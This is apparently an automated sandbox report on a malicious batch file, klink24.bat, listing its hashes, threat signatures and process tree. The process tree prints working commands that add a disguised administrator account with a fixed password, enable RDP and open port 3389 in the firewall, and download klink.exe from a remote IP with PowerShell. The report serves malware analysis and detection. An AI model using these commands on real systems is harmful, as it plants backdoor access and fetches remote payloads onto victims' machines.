Analysis

  • max time kernel
    198s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11-10-2023 20:31

General

  • Target

    klink24.bat

  • Size

    1KB

  • MD5

    81b71168a37befd2646587909efa050b

  • SHA1

    965a0db15b5cf77ea3c285d4f49d41b92a3d364d

  • SHA256

    d51b466d9bd852e4b463096b9a922fe9e06e75e1258d274b576103498e578c01

  • SHA512

    55e5a056d70b6799600c28d084593cdbde2eab836b33024d458f00971f03a87a076b760ee6b21913523996d20b695bc7f024eb59e46c03aa253708e5fd62339b

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\klink24.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2540
      • C:\Windows\system32\find.exe
        Find "="
        3⤵
          PID:2528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2516
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2524
        • C:\Windows\system32\find.exe
          Find "="
          3⤵
            PID:2536
        • C:\Windows\system32\net.exe
          net user Defender-Update defen2!AW7W21 /add /expires:never
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user Defender-Update defen2!AW7W21 /add /expires:never
            3⤵
              PID:3044
          • C:\Windows\system32\net.exe
            net localgroup Administrators Defender-Update /ADD
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2916
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administrators Defender-Update /ADD
              3⤵
                PID:2884
            • C:\Windows\system32\net.exe
              net localgroup "Remote Desktop Users" Defender-Update /ADD
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3012
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup "Remote Desktop Users" Defender-Update /ADD
                3⤵
                  PID:2340
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                2⤵
                  PID:2232
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                  2⤵
                  • Modifies Windows Firewall
                  PID:2472
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell iwr http://78.47.123.155:8233/klink.exe -OutFile c:\programdata\klink.exe
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1608

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/1608-6-0x000000001B2B0000-0x000000001B592000-memory.dmp

                Filesize

                2.9MB

              • memory/1608-7-0x0000000002560000-0x0000000002568000-memory.dmp

                Filesize

                32KB

              • memory/1608-8-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

                Filesize

                9.6MB

              • memory/1608-9-0x00000000024E0000-0x0000000002560000-memory.dmp

                Filesize

                512KB

              • memory/1608-11-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

                Filesize

                9.6MB

              • memory/1608-12-0x00000000024E0000-0x0000000002560000-memory.dmp

                Filesize

                512KB

              • memory/1608-10-0x00000000024E0000-0x0000000002560000-memory.dmp

                Filesize

                512KB

              • memory/1608-13-0x00000000024E0000-0x0000000002560000-memory.dmp

                Filesize

                512KB

              • memory/1608-14-0x00000000024E0000-0x0000000002560000-memory.dmp

                Filesize

                512KB